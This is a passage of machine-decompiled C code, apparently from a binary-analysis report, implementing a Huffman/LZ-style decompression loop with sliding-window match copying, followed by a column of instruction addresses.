							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
						}
						_t347 = _t654 + 4;
						while(1) {
							_t614 =  *(_t663 + 0xe6dc);
							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
							_t506 =  *_t347;
							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
								goto L16;
							}
							L10:
							__eflags = _t506 - _t666;
							if(__eflags > 0) {
								L100:
								_t418 = 1;
								L101:
								return _t418;
							}
							if(__eflags != 0) {
								L13:
								__eflags = _t506 - _t499;
								if(_t506 < _t499) {
									L15:
									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
										L151:
										 *((char*)(_t654 + 0x4ad3)) = 1;
										goto L100;
									}
									goto L16;
								}
								__eflags =  *((char*)(_t654 + 0x4ad2));
								if( *((char*)(_t654 + 0x4ad2)) == 0) {
									goto L151;
								}
								goto L15;
							}
							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
								goto L100;
							}
							goto L13;
							L16:
							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
								L21:
								_t667 = _t654 + 4;
								_t351 = E00C3A4ED(_t667);
								_t352 =  *(_t654 + 0xb4);
								_t616 = _t351 & 0x0000fffe;
								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
									_t490 = 0xf;
									_t353 = _t352 + 1;
									__eflags = _t353 - _t490;
									if(_t353 >= _t490) {
										L30:
										_t510 =  *(_t667 + 4) + _t490;
										 *(_t667 + 4) = _t510 & 0x00000007;
										_t355 = _t510 >> 3;
										 *_t667 =  *_t667 + _t355;
										_t512 = 0x10;
										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
										asm("sbb eax, eax");
										_t356 = _t355 & _t515;
										__eflags = _t356;
										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
										_t347 = _t654 + 4;
										L31:
										__eflags = _t619 - 0x100;
										if(_t619 >= 0x100) {
											__eflags = _t619 - 0x106;
											if(_t619 < 0x106) {
												__eflags = _t619 - 0x100;
												if(_t619 != 0x100) {
													__eflags = _t619 - 0x101;
													if(_t619 != 0x101) {
														_t620 = _t619 + 0xfffffefe;
														__eflags = _t620;
														_t518 =  &((_t663 + 0x60)[_t620]);
														_t491 =  *_t518;
														 *(_t691 + 0x24) = _t491;
														if(_t620 == 0) {
															L122:
															_t668 = _t654 + 4;
															 *(_t663 + 0x60) = _t491;
															_t357 = E00C3A4ED(_t668);
															_t358 =  *(_t654 + 0x2d78);
															_t622 = _t357 & 0x0000fffe;
															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
																_t492 = 0xf;
																_t359 = _t358 + 1;
																__eflags = _t359 - _t492;
																if(_t359 >= _t492) {
																	L130:
																	_t521 =  *(_t668 + 4) + _t492;
																	 *(_t668 + 4) = _t521 & 0x00000007;
																	_t361 = _t521 >> 3;
																	 *_t668 =  *_t668 + _t361;
																	_t523 = 0x10;
																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t362 = _t361 & _t526;
																	__eflags = _t362;
																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
																	L131:
																	_t493 = _t363 & 0x0000ffff;
																	__eflags = _t493 - 8;
																	if(_t493 >= 8) {
																		_t671 = (_t493 >> 2) - 1;
																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
																		__eflags = _t493;
																	} else {
																		_t671 = 0;
																	}
																	_t496 = _t493 + 2;
																	__eflags = _t671;
																	if(_t671 != 0) {
																		_t390 = E00C3A4ED(_t654 + 4);
																		_t532 = 0x10;
																		_t496 = _t496 + (_t390 >> _t532 - _t671);
																		_t535 =  *(_t654 + 8) + _t671;
																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
																		_t536 = _t535 & 0x00000007;
																		__eflags = _t536;
																		 *(_t654 + 8) = _t536;
																	}
																	_t625 =  *(_t663 + 0x7c);
																	_t673 = _t625 -  *(_t691 + 0x24);
																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
																	 *(_t663 + 0x74) = _t496;
																	__eflags = _t673 - _t365;
																	if(_t673 >= _t365) {
																		L147:
																		_t347 = _t654 + 4;
																		__eflags = _t496;
																		if(_t496 == 0) {
																			goto L7;
																		}
																		_t655 =  *(_t663 + 0xe6dc);
																		do {
																			_t656 = _t655 & _t673;
																			_t673 = _t673 + 1;
																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
																			_t655 =  *(_t663 + 0xe6dc);
																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
																			_t496 = _t496 - 1;
																			__eflags = _t496;
																		} while (_t496 != 0);
																		L150:
																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																		L33:
																		_t347 = _t654 + 4;
																		goto L7;
																	} else {
																		__eflags = _t625 - _t365;
																		if(_t625 >= _t365) {
																			goto L147;
																		}
																		_t370 =  *((intOrPtr*)(_t663 + 0x4b40));
																		_t675 = _t673 + _t370;
																		_t529 = _t370 + _t625;
																		 *(_t691 + 0x1c) = _t529;
																		 *(_t663 + 0x7c) = _t625 + _t496;
																		__eflags =  *(_t691 + 0x24) - _t496;
																		if( *(_t691 + 0x24) >= _t496) {
																			__eflags = _t496 - 8;
																			if(_t496 < 8) {
																				L85:
																				_t347 = _t654 + 4;
																				__eflags = _t498;
																				if(_t498 == 0) {
																					L7:
																					L8:
																					_t666 =  *((intOrPtr*)(_t691 + 0x14));
																					while(1) {
																						_t614 =  *(_t663 + 0xe6dc);
																						 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
																						_t506 =  *_t347;
																						__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
																						if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
																							goto L16;
																						}
																						goto L10;
																					}
																				}
																				 *_t529 =  *_t675;
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 1;
																				if(_t498 <= 1) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 2;
																				if(_t498 <= 2) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 3;
																				if(_t498 <= 3) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 4;
																				if(_t498 <= 4) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 5;
																				if(_t498 <= 5) {
																					goto L7;
																				}
																				__eflags = _t498 - 6;
																				_t499 =  *((intOrPtr*)(_t691 + 0x10));
																				 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																				_t347 = _t654 + 4;
																				if(_t498 > 6) {
																					 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																					_t347 = _t654 + 4;
																				}
																				goto L8;
																			}
																			_t380 = _t496 >> 3;
																			__eflags = _t380;
																			 *(_t691 + 0x24) = _t380;
																			_t657 = _t380;
																			do {
																				E00C4EA80(_t529, _t675, 8);
																				_t530 =  *((intOrPtr*)(_t691 + 0x28));
																				_t691 = _t691 + 0xc;
																				_t529 = _t530 + 8;
																				_t675 = _t675 + 8;
																				_t496 = _t496 - 8;
																				 *(_t691 + 0x1c) = _t529;
																				_t657 = _t657 - 1;
																				__eflags = _t657;
																			} while (_t657 != 0);
																			L84:
																			_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																			goto L85;
																		}
																		__eflags = _t496 - 8;
																		if(_t496 < 8) {
																			goto L85;
																		}
																		_t628 = _t496 >> 3;
																		__eflags = _t628;
																		do {
																			_t496 = _t496 - 8;
																			 *_t529 =  *_t675;
																			 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																			 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																			 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																			 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																			 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																			 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																			_t389 =  *((intOrPtr*)(_t675 + 7));
																			_t675 = _t675 + 8;
																			 *((char*)(_t529 + 7)) = _t389;
																			_t529 = _t529 + 8;
																			_t628 = _t628 - 1;
																			__eflags = _t628;
																		} while (_t628 != 0);
																		goto L85;
																	}
																}
																_t538 = _t654 + (_t359 + 0xb3e) * 4;
																while(1) {
																	__eflags = _t622 -  *_t538;
																	if(_t622 <  *_t538) {
																		break;
																	}
																	_t359 = _t359 + 1;
																	_t538 = _t538 + 4;
																	__eflags = _t359 - 0xf;
																	if(_t359 < 0xf) {
																		continue;
																	}
																	goto L130;
																}
																_t492 = _t359;
																goto L130;
															}
															_t539 = 0x10;
															_t629 = _t622 >> _t539 - _t358;
															_t542 = ( *(_t629 + _t654 + 0x2d7c) & 0x000000ff) +  *(_t668 + 4);
															 *_t668 =  *_t668 + (_t542 >> 3);
															 *(_t668 + 4) = _t542 & 0x00000007;
															_t363 =  *(_t654 + 0x317c + _t629 * 2) & 0x0000ffff;
															goto L131;
														} else {
															goto L121;
														}
														do {
															L121:
															 *_t518 =  *(_t518 - 4);
															_t518 = _t518 - 4;
															_t620 = _t620 - 1;
															__eflags = _t620;
														} while (_t620 != 0);
														goto L122;
													}
													_t498 =  *(_t663 + 0x74);
													_t666 =  *((intOrPtr*)(_t691 + 0x14));
													__eflags = _t498;
													if(_t498 == 0) {
														L23:
														_t499 =  *((intOrPtr*)(_t691 + 0x10));
														continue;
													}
													_t397 =  *(_t663 + 0x60);
													_t630 =  *(_t663 + 0x7c);
													_t677 = _t630 - _t397;
													 *(_t691 + 0x1c) = _t397;
													_t399 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													__eflags = _t677 - _t399;
													if(_t677 >= _t399) {
														L116:
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L7;
														}
														_t658 =  *(_t663 + 0xe6dc);
														do {
															_t659 = _t658 & _t677;
															_t677 = _t677 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t659 +  *((intOrPtr*)(_t663 + 0x4b40))));
															_t658 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t658;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													}
													__eflags = _t630 - _t399;
													if(_t630 >= _t399) {
														goto L116;
													}
													_t404 =  *((intOrPtr*)(_t663 + 0x4b40));
													_t675 = _t677 + _t404;
													_t529 = _t404 + _t630;
													 *(_t691 + 0x24) = _t529;
													 *(_t663 + 0x7c) = _t630 + _t498;
													__eflags =  *(_t691 + 0x1c) - _t498;
													if( *(_t691 + 0x1c) >= _t498) {
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t407 = _t498 >> 3;
														__eflags = _t407;
														_t660 = _t407;
														do {
															E00C4EA80(_t529, _t675, 8);
															_t545 =  *((intOrPtr*)(_t691 + 0x30));
															_t691 = _t691 + 0xc;
															_t529 = _t545 + 8;
															_t675 = _t675 + 8;
															_t498 = _t498 - 8;
															 *(_t691 + 0x24) = _t529;
															_t660 = _t660 - 1;
															__eflags = _t660;
														} while (_t660 != 0);
														goto L84;
													}
													__eflags = _t498 - 8;
													if(_t498 < 8) {
														goto L85;
													}
													_t633 = _t498 >> 3;
													__eflags = _t633;
													do {
														_t498 = _t498 - 8;
														 *_t529 =  *_t675;
														 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
														 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
														 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
														 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
														 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
														 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
														_t416 =  *((intOrPtr*)(_t675 + 7));
														_t675 = _t675 + 8;
														 *((char*)(_t529 + 7)) = _t416;
														_t529 = _t529 + 8;
														_t633 = _t633 - 1;
														__eflags = _t633;
													} while (_t633 != 0);
													goto L85;
												}
												_push(_t691 + 0x28);
												_t417 = E00C43564(_t663, _t347);
												__eflags = _t417;
												if(_t417 == 0) {
													goto L100;
												}
												_t420 = E00C41A0E(_t663, _t691 + 0x28);
												__eflags = _t420;
												if(_t420 != 0) {
													goto L33;
												}
												goto L100;
											}
											_t501 = _t619 - 0x106;
											__eflags = _t501 - 8;
											if(_t501 >= 8) {
												_t680 = (_t501 >> 2) - 1;
												_t501 = (_t501 & 0x00000003 | 0x00000004) << _t680;
												__eflags = _t501;
											} else {
												_t680 = 0;
											}
											_t498 = _t501 + 2;
											__eflags = _t680;
											if(_t680 == 0) {
												_t681 = _t654 + 4;
											} else {
												_t472 = E00C3A4ED(_t347);
												_t600 = 0x10;
												_t498 = _t498 + (_t472 >> _t600 - _t680);
												_t603 =  *(_t654 + 8) + _t680;
												_t681 = _t654 + 4;
												 *_t681 =  *_t681 + (_t603 >> 3);
												 *(_t681 + 4) = _t603 & 0x00000007;
											}
											_t421 = E00C3A4ED(_t681);
											_t422 =  *(_t654 + 0xfa0);
											_t635 = _t421 & 0x0000fffe;
											__eflags = _t635 -  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4));
											if(_t635 >=  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4))) {
												_t682 = 0xf;
												_t423 = _t422 + 1;
												__eflags = _t423 - _t682;
												if(_t423 >= _t682) {
													L49:
													_t552 =  *(_t654 + 8) + _t682;
													 *(_t654 + 8) = _t552 & 0x00000007;
													_t425 = _t552 >> 3;
													 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + _t425;
													_t554 = 0x10;
													_t557 =  *((intOrPtr*)(_t654 + 0xf60 + _t682 * 4)) + (_t635 -  *((intOrPtr*)(_t654 + 0xf1c + _t682 * 4)) >> _t554 - _t682);
													__eflags = _t557 -  *((intOrPtr*)(_t654 + 0xf1c));
													asm("sbb eax, eax");
													_t426 = _t425 & _t557;
													__eflags = _t426;
													_t427 =  *(_t654 + 0x1ba4 + _t426 * 2) & 0x0000ffff;
													goto L50;
												}
												_t593 = _t654 + (_t423 + 0x3c8) * 4;
												while(1) {
													__eflags = _t635 -  *_t593;
													if(_t635 <  *_t593) {
														break;
													}
													_t423 = _t423 + 1;
													_t593 = _t593 + 4;
													__eflags = _t423 - 0xf;
													if(_t423 < 0xf) {
														continue;
													}
													goto L49;
												}
												_t682 = _t423;
												goto L49;
											} else {
												_t594 = 0x10;
												_t652 = _t635 >> _t594 - _t422;
												_t597 = ( *(_t652 + _t654 + 0xfa4) & 0x000000ff) +  *(_t681 + 4);
												 *_t681 =  *_t681 + (_t597 >> 3);
												 *(_t681 + 4) = _t597 & 0x00000007;
												_t427 =  *(_t654 + 0x13a4 + _t652 * 2) & 0x0000ffff;
												L50:
												_t638 = _t427 & 0x0000ffff;
												__eflags = _t638 - 4;
												if(_t638 >= 4) {
													_t430 = (_t638 >> 1) - 1;
													_t638 = (_t638 & 0x00000001 | 0x00000002) << _t430;
													__eflags = _t638;
												} else {
													_t430 = 0;
												}
												 *(_t691 + 0x18) = _t430;
												_t559 = _t638 + 1;
												 *(_t691 + 0x24) = _t559;
												_t683 = _t559;
												 *(_t691 + 0x1c) = _t683;
												__eflags = _t430;
												if(_t430 == 0) {
													L70:
													__eflags = _t683 - 0x100;
													if(_t683 > 0x100) {
														_t498 = _t498 + 1;
														__eflags = _t683 - 0x2000;
														if(_t683 > 0x2000) {
															_t498 = _t498 + 1;
															__eflags = _t683 - 0x40000;
															if(_t683 > 0x40000) {
																_t498 = _t498 + 1;
																__eflags = _t498;
															}
														}
													}
													 *(_t663 + 0x6c) =  *(_t663 + 0x68);
													 *(_t663 + 0x68) =  *(_t663 + 0x64);
													 *(_t663 + 0x64) =  *(_t663 + 0x60);
													 *(_t663 + 0x60) = _t683;
													_t641 =  *(_t663 + 0x7c);
													_t561 = _t641 - _t683;
													_t435 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													 *(_t663 + 0x74) = _t498;
													 *(_t691 + 0x24) = _t561;
													__eflags = _t561 - _t435;
													if(_t561 >= _t435) {
														L93:
														_t666 =  *((intOrPtr*)(_t691 + 0x14));
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L23;
														}
														_t684 =  *(_t663 + 0xe6dc);
														_t661 =  *(_t691 + 0x24);
														do {
															_t685 = _t684 & _t661;
															_t661 = _t661 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)( *((intOrPtr*)(_t663 + 0x4b40)) + _t685));
															_t684 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t684;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													} else {
														__eflags = _t641 - _t435;
														if(_t641 >= _t435) {
															goto L93;
														}
														_t440 =  *((intOrPtr*)(_t663 + 0x4b40));
														_t675 = _t440 + _t561;
														_t529 = _t440 + _t641;
														 *(_t691 + 0x24) = _t529;
														 *(_t663 + 0x7c) = _t641 + _t498;
														__eflags =  *(_t691 + 0x1c) - _t498;
														if( *(_t691 + 0x1c) >= _t498) {
															__eflags = _t498 - 8;
															if(_t498 < 8) {
																goto L85;
															}
															_t443 = _t498 >> 3;
															__eflags = _t443;
															 *(_t691 + 0x1c) = _t443;
															_t662 = _t443;
															do {
																E00C4EA80(_t529, _t675, 8);
																_t563 =  *((intOrPtr*)(_t691 + 0x30));
																_t691 = _t691 + 0xc;
																_t529 = _t563 + 8;
																_t675 = _t675 + 8;
																_t498 = _t498 - 8;
																 *(_t691 + 0x24) = _t529;
																_t662 = _t662 - 1;
																__eflags = _t662;
															} while (_t662 != 0);
															goto L84;
														}
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t644 = _t498 >> 3;
														__eflags = _t644;
														do {
															_t498 = _t498 - 8;
															 *_t529 =  *_t675;
															 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
															 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
															 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
															 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
															 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
															 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
															_t452 =  *((intOrPtr*)(_t675 + 7));
															_t675 = _t675 + 8;
															 *((char*)(_t529 + 7)) = _t452;
															_t529 = _t529 + 8;
															_t644 = _t644 - 1;
															__eflags = _t644;
														} while (_t644 != 0);
														goto L85;
													}
												} else {
													__eflags = _t430 - 4;
													if(__eflags < 0) {
														_t453 = E00C47D76(_t654 + 4);
														_t565 = 0x20;
														_t568 =  *(_t654 + 8) +  *(_t691 + 0x18);
														_t683 = (_t453 >> _t565 -  *(_t691 + 0x18)) +  *(_t691 + 0x24);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t568 >> 3);
														_t569 = _t568 & 0x00000007;
														__eflags = _t569;
														 *(_t654 + 8) = _t569;
														L69:
														 *(_t691 + 0x1c) = _t683;
														goto L70;
													}
													if(__eflags <= 0) {
														_t645 = _t654 + 4;
													} else {
														_t467 = E00C47D76(_t654 + 4);
														_t651 =  *(_t691 + 0x18);
														_t587 = 0x24;
														_t590 = _t651 - 4 +  *(_t654 + 8);
														_t645 = _t654 + 4;
														_t683 = (_t467 >> _t587 - _t651 << 4) +  *(_t691 + 0x24);
														 *_t645 =  *_t645 + (_t590 >> 3);
														 *(_t645 + 4) = _t590 & 0x00000007;
													}
													_t456 = E00C3A4ED(_t645);
													_t457 =  *(_t654 + 0x1e8c);
													_t647 = _t456 & 0x0000fffe;
													__eflags = _t647 -  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4));
													if(_t647 >=  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4))) {
														_t571 = 0xf;
														_t458 = _t457 + 1;
														 *(_t691 + 0x18) = _t571;
														__eflags = _t458 - _t571;
														if(_t458 >= _t571) {
															L66:
															_t573 =  *(_t654 + 8) +  *(_t691 + 0x18);
															 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t573 >> 3);
															_t461 =  *(_t691 + 0x18);
															 *(_t654 + 8) = _t573 & 0x00000007;
															_t575 = 0x10;
															_t578 =  *((intOrPtr*)(_t654 + 0x1e4c + _t461 * 4)) + (_t647 -  *((intOrPtr*)(_t654 + 0x1e08 + _t461 * 4)) >> _t575 - _t461);
															__eflags = _t578 -  *((intOrPtr*)(_t654 + 0x1e08));
															asm("sbb eax, eax");
															_t462 = _t461 & _t578;
															__eflags = _t462;
															_t463 =  *(_t654 + 0x2a90 + _t462 * 2) & 0x0000ffff;
															goto L67;
														}
														_t580 = _t654 + (_t458 + 0x783) * 4;
														while(1) {
															__eflags = _t647 -  *_t580;
															if(_t647 <  *_t580) {
																break;
															}
															_t458 = _t458 + 1;
															_t580 = _t580 + 4;
															__eflags = _t458 - 0xf;
															if(_t458 < 0xf) {
																continue;
															}
															goto L66;
														}
														 *(_t691 + 0x18) = _t458;
														goto L66;
													} else {
														_t581 = 0x10;
														_t650 = _t647 >> _t581 - _t457;
														_t584 = ( *(_t650 + _t654 + 0x1e90) & 0x000000ff) +  *(_t654 + 8);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t584 >> 3);
														 *(_t654 + 8) = _t584 & 0x00000007;
														_t463 =  *(_t654 + 0x2290 + _t650 * 2) & 0x0000ffff;
														L67:
														_t683 = _t683 + (_t463 & 0x0000ffff);
														goto L69;
													}
												}
											}
										}
										 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) = _t619;
										_t69 = _t663 + 0x7c;
										 *_t69 =  *(_t663 + 0x7c) + 1;
										__eflags =  *_t69;
										goto L33;
									}
									_t607 = _t654 + (_t353 + 0xd) * 4;
									while(1) {
										__eflags = _t616 -  *_t607;
										if(_t616 <  *_t607) {
											break;
										}
										_t353 = _t353 + 1;
										_t607 = _t607 + 4;
										__eflags = _t353 - 0xf;
										if(_t353 < 0xf) {
											continue;
										}
										goto L30;
									}
									_t490 = _t353;
									goto L30;
								}
								_t608 = 0x10;
								_t653 = _t616 >> _t608 - _t352;
								_t611 = ( *(_t653 + _t654 + 0xb8) & 0x000000ff) +  *(_t667 + 4);
								 *_t667 =  *_t667 + (_t611 >> 3);
								_t347 = _t654 + 4;
								 *(_t347 + 4) = _t611 & 0x00000007;
								_t619 =  *(_t654 + 0x4b8 + _t653 * 2) & 0x0000ffff;
								goto L31;
							}
							__eflags = _t507 -  *(_t663 + 0x7c);
							if(_t507 ==  *(_t663 + 0x7c)) {
								goto L21;
							}
							E00C447DA(_t663);
							__eflags =  *((intOrPtr*)(_t663 + 0x4c5c)) -  *((intOrPtr*)(_t663 + 0x4c4c));
							if(__eflags > 0) {
								L152:
								_t418 = 0;
								goto L101;
							}
							if(__eflags < 0) {
								goto L21;
							}
							__eflags =  *((intOrPtr*)(_t663 + 0x4c58)) -  *((intOrPtr*)(_t663 + 0x4c48));
							if( *((intOrPtr*)(_t663 + 0x4c58)) >  *((intOrPtr*)(_t663 + 0x4c48))) {
								goto L152;
							}
							goto L21;
						}
					}
				}
				 *((char*)(_t654 + 0x2c)) = 1;
				_push(_t654 + 0x30);
				_push(_t654 + 0x18);
				_push(_t654 + 4);
				if(E00C4397F(__ecx) != 0) {
					goto L3;
				}
				goto L2;
			}


















































































































































                                            0x00c46ce0
                                            0x00c46ce4
                                            0x00c46cea
                                            0x00c46d13
                                            0x00c46d16
                                            0x00c46d1b
                                            0x00c46d1e
                                            0x00c46d05
                                            0x00c46d05
                                            0x00000000
                                            0x00c46d20
                                            0x00c46d2b
                                            0x00c46d2e
                                            0x00c46d31
                                            0x00c46d35
                                            0x00c46d39
                                            0x00c46d3d
                                            0x00c46d3f
                                            0x00c46d41
                                            0x00c46d41
                                            0x00c46d45
                                            0x00c46d52
                                            0x00c46d52
                                            0x00c46d58
                                            0x00c46d5b
                                            0x00c46d5d
                                            0x00c46d61
                                            0x00000000
                                            0x00000000
                                            0x00c46d63
                                            0x00c46d63
                                            0x00c46d65
                                            0x00c472f0
                                            0x00c472f0
                                            0x00c472f2
                                            0x00000000
                                            0x00c472f3
                                            0x00c46d6b
                                            0x00c46d79
                                            0x00c46d79
                                            0x00c46d7b
                                            0x00c46d8a
                                            0x00c46d8a
                                            0x00c46d90
                                            0x00c4763f
                                            0x00c4763f
                                            0x00000000
                                            0x00c4763f
                                            0x00000000
                                            0x00c46d90
                                            0x00c46d7d
                                            0x00c46d84
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c46d84
                                            0x00c46d70
                                            0x00c46d73
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c46d96
                                            0x00c46d96
                                            0x00c46da3
                                            0x00c46da8
                                            0x00c46ddc
                                            0x00c46ddc
                                            0x00c46de1
                                            0x00c46de8
                                            0x00c46dee
                                            0x00c46df4
                                            0x00c46df8
                                            0x00c46e32
                                            0x00c46e33
                                            0x00c46e34
                                            0x00c46e36
                                            0x00c46e4f
                                            0x00c46e52
                                            0x00c46e59
                                            0x00c46e5c
                                            0x00c46e5f
                                            0x00c46e68
                                            0x00c46e71
                                            0x00c46e73
                                            0x00c46e76
                                            0x00c46e78
                                            0x00c46e78
                                            0x00c46e7a
                                            0x00c46e82
                                            0x00c46e85
                                            0x00c46e8a
                                            0x00c46e8c
                                            0x00c46ea5
                                            0x00c46eab
                                            0x00c472c7
                                            0x00c472c9
                                            0x00c472fc
                                            0x00c47302
                                            0x00c4741e
                                            0x00c4741e
                                            0x00c47427
                                            0x00c4742a
                                            0x00c4742c
                                            0x00c47430
                                            0x00c4743f
                                            0x00c4743f
                                            0x00c47442
                                            0x00c47447
                                            0x00c4744e
                                            0x00c47454
                                            0x00c4745a
                                            0x00c47461
                                            0x00c4748f
                                            0x00c47490
                                            0x00c47491
                                            0x00c47493
                                            0x00c474af
                                            0x00c474b2
                                            0x00c474b9
                                            0x00c474bc
                                            0x00c474bf
                                            0x00c474cb
                                            0x00c474d7
                                            0x00c474d9
                                            0x00c474df
                                            0x00c474e1
                                            0x00c474e1
                                            0x00c474e3
                                            0x00c474eb
                                            0x00c474eb
                                            0x00c474ee
                                            0x00c474f1
                                            0x00c47502
                                            0x00c47505
                                            0x00c47505
                                            0x00c474f3
                                            0x00c474f3
                                            0x00c474f3
                                            0x00c47507
                                            0x00c4750a
                                            0x00c4750c
                                            0x00c47511
                                            0x00c47518
                                            0x00c47520
                                            0x00c47522
                                            0x00c47529
                                            0x00c4752c
                                            0x00c4752c
                                            0x00c4752f
                                            0x00c4752f
                                            0x00c47532
                                            0x00c4753d
                                            0x00c47541
                                            0x00c47546
                                            0x00c47549
                                            0x00c4754b
                                            0x00c475ff
                                            0x00c475ff
                                            0x00c47602
                                            0x00c47604
                                            0x00000000
                                            0x00000000
                                            0x00c4760a
                                            0x00c47610
                                            0x00c47616
                                            0x00c4761b
                                            0x00c4761f
                                            0x00c47625
                                            0x00c4762e
                                            0x00c47631
                                            0x00c47631
                                            0x00c47631
                                            0x00c47636
                                            0x00c47636
                                            0x00c46e9d
                                            0x00c46e9d
                                            0x00000000
                                            0x00c47551
                                            0x00c47551
                                            0x00c47553
                                            0x00000000
                                            0x00000000
                                            0x00c47559
                                            0x00c4755f
                                            0x00c47561
                                            0x00c47567
                                            0x00c4756b
                                            0x00c4756e
                                            0x00c47572
                                            0x00c475c4
                                            0x00c475c7
                                            0x00c471fb
                                            0x00c471fb
                                            0x00c471fe
                                            0x00c47200
                                            0x00c46d4a
                                            0x00c46d4e
                                            0x00c46d4e
